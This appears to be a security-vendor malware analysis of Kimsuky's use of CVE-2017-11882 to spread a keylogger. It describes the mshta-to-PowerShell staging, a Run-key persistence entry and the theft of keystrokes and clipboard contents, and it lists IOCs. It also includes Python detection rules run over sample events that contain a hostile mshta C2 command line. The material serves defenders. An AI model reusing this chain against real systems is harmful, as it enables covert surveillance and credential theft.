Keylogger Exploits MS Office Equation Editor Vulnerability (Kimsuky)

AhnLab SEcurity intelligence Center (ASEC) has identified details of the Kimsuky threat group recently exploiting a vulnerability (CVE-2017-11882) in the equation editor included in MS Office (EQNEDT32.EXE) to distribute a keylogger. The exploit launches the mshta process, which loads a remote page carrying an embedded malicious script, and that script stages the keylogger.

Figure 1. mshta.exe executed via the equation editor program (EQNEDT32.exe)
Figure 2. The C2 server screen (mshta.exe)

The page mshta connects to is http://xxxxxxxxxxx.xxxxxx.xxxxxxxx.com/images/png/error.php (file name error.php). As shown in Figure 2, the page displays a “Not Found” message so that a user who notices it would assume the connection failed, while the script embedded in the page is actually being run.

Figure 3. Content of the malicious script (error.php)

Figure 3 shows the content of error.php. Its main behaviors are downloading an additional malware strain from the C2 (Query=50) via a PowerShell command, creating a file named desktop.ini.bak under the Users\Public\Pictures path, and registering desktop.ini.bak in the Run key under HKLM with the value name “Clear Web History” so that it runs again at logon. The additional malware was downloaded and executed via PowerShell, but a coding error by the attacker in the part that runs wscript meant the file creation and Run key registration never actually took place. When the script is edited to run as intended for replication, the desktop.ini.bak file is created and correctly registered in the registry key, as shown in Figure 4.

Figure 4. Registration to the autorun registry
Figure 5. Content of the malicious script (50.php)

The first downloaded malware, shown in Figure 5, is a PowerShell script (50.php). It collects system and IP information and sends it to the C2 (Query=97), and it can also download and execute a keylogger from the C2 (Query=107).

Figure 6. Content of the malicious script (107.php)
Figure 7. Keylogging data content (desktop.ini.bak)

Figure 6 shows the main part of the keylogger script (107.php). It creates the file desktop.ini.bak under the Users\Public\Music path and records the user’s keystrokes and clipboard contents in it. It uses the mutex “Global\AlreadyRunning19122345” to prevent duplicate instances. At random intervals within a time range set by the threat actor, the collected data is sent to the C2 (Query=97), the file is deleted, and a new one is created. The overall process execution is shown in the Procmon process tree (Figure 8).

Figure 8. The Procmon process tree
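The behaviours above (EQNEDT32.EXE spawning mshta with a URL, the HKLM Run value named “Clear Web History”, and desktop.ini.bak written under Users\Public) translate directly into detection logic. The block below is an added example, not ASEC’s code: it runs three rules over constructed Sysmon-style events (the event shape, the host paths, the command lines and the Run value data are assumptions; the C2 URL is the masked one from the report). The mshta rule is generalised slightly to the Office host processes as well as EQNEDT32.EXE.

```python
"""Detection rules for the CVE-2017-11882 -> mshta -> keylogger chain.

Added example, not ASEC's code. Runs over constructed Sysmon-style events
(assumed shape: id 1 process create, 11 file create, 13 registry value set).
"""
import ntpath
import re

# Parents that should never launch mshta.exe with a URL. EQNEDT32.EXE is the
# case in the report; the Office hosts are an assumed generalisation.
SUSPECT_PARENTS = {"eqnedt32.exe", "winword.exe", "excel.exe", "powerpnt.exe"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Run value under HKLM; the value name is the last path component.
RUN_VALUE_RE = re.compile(r"^HKLM\\.*\\CurrentVersion\\Run\\(?P<name>[^\\]+)$", re.IGNORECASE)
PUBLIC_PATH_RE = re.compile(r"\\Users\\Public\\", re.IGNORECASE)
PUBLIC_BAK_RE = re.compile(r"\\Users\\Public\\.*\\desktop\.ini\.bak$", re.IGNORECASE)

# Assumed image paths for the constructed telemetry.
EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
MSHTA = r"C:\Windows\System32\mshta.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C2 = "http://xxxxxxxxxxx.xxxxxx.xxxxxxxx.com/images/png/error.php"  # masked as in the report

# Constructed sample events (not real logs). The first six mirror the chain
# in Figures 1-8; the last three are benign noise that must not fire.
EVENTS = [
    {"id": 1, "image": EQNEDT, "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": '"' + EQNEDT + '" -Embedding'},
    {"id": 1, "image": MSHTA, "parent": EQNEDT, "cmdline": "mshta " + C2},
    {"id": 1, "image": PS, "parent": MSHTA, "cmdline": "powershell -w hidden -c ..."},
    {"id": 11, "image": PS, "target": r"C:\Users\Public\Pictures\desktop.ini.bak"},
    {"id": 13, "image": PS,
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Clear Web History",
     "details": r"wscript.exe //e:vbscript C:\Users\Public\Pictures\desktop.ini.bak"},
    {"id": 11, "image": PS, "target": r"C:\Users\Public\Music\desktop.ini.bak"},
    {"id": 1, "image": MSHTA, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta C:\Tools\inventory.hta"},
    {"id": 13, "image": r"C:\Windows\System32\msiexec.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},
    {"id": 11, "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\alice\Desktop\desktop.ini"},
]


def base(path):
    """Lower-cased file name of a Windows path (ntpath works on any OS)."""
    return ntpath.basename(path).lower()


def rule_office_spawns_mshta(ev):
    """Figure 1: EQNEDT32.EXE (or an Office host) launching mshta.exe with a URL."""
    return (ev["id"] == 1 and base(ev["image"]) == "mshta.exe"
            and base(ev["parent"]) in SUSPECT_PARENTS
            and URL_RE.search(ev["cmdline"]) is not None)


def rule_run_value_public_payload(ev):
    """error.php / Figure 4: HKLM Run value named 'Clear Web History', or any
    HKLM Run value whose data points into Users\\Public."""
    if ev["id"] != 13:
        return False
    m = RUN_VALUE_RE.search(ev["target"])
    if m is None:
        return False
    return (m.group("name").lower() == "clear web history"
            or PUBLIC_PATH_RE.search(ev.get("details", "")) is not None)


def rule_public_desktop_ini_bak(ev):
    """desktop.ini.bak created under Users\\Public (Pictures for the loader,
    Music for the keylog/clipboard data)."""
    return ev["id"] == 11 and PUBLIC_BAK_RE.search(ev["target"]) is not None


RULES = {
    "office_spawns_mshta": rule_office_spawns_mshta,
    "run_value_public_payload": rule_run_value_public_payload,
    "public_desktop_ini_bak": rule_public_desktop_ini_bak,
}


def detect(events):
    """Return (rule_name, event) pairs for every event that matches a rule."""
    return [(name, ev) for ev in events for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, ev in detect(EVENTS):
        print(f"{name}: {ev.get('cmdline') or ev.get('target')}")
```

The Run value rule is deliberately wider than the single value name from the report, because a renamed value in the next campaign would otherwise slip through; restricting it to HKLM matches what the report observed, and a HKU/HKCU variant would need the same check against those hives.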

The Kimsuky group continues to exploit the MS Office equation editor (EQNEDT32.EXE) vulnerability (CVE-2017-11882) it has frequently used in the past, because unpatched installations raise the success rate of its attacks. Microsoft removed the equation editor from Office in its January 2018 security updates, so a fully patched Office no longer contains EQNEDT32.EXE, and the presence of that binary on a host is itself worth checking. Patching is essential to prevent infections through old vulnerabilities: software must always be updated to the latest version, and software that has reached end of service (EOS) should no longer be used. Users must also not open suspicious document files and should update V3 to the latest version to prevent infection in advance. In addition to endpoint security products (V3), sandbox-based APT solutions such as MDS should be implemented to limit the damage from cyberattacks.

[File Detection]

  • Trojan/VBS.Agent.SC198696 (2024.03.29.00)
  • Downloader/PowerShell.Agent.SC197158 (2024.02.26.03)
  • Keylogger/PowerShell.Agent.SC197159 (2024.02.26.03)

[IOC] 

MD5s

  • 279c86f3796d14d2a4d89049c2b3fa2d
  • 5bfeef520eb1e62ea2ef313bb979aeae
  • d404ab9c8722fc97cceb95f258a2e70d

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
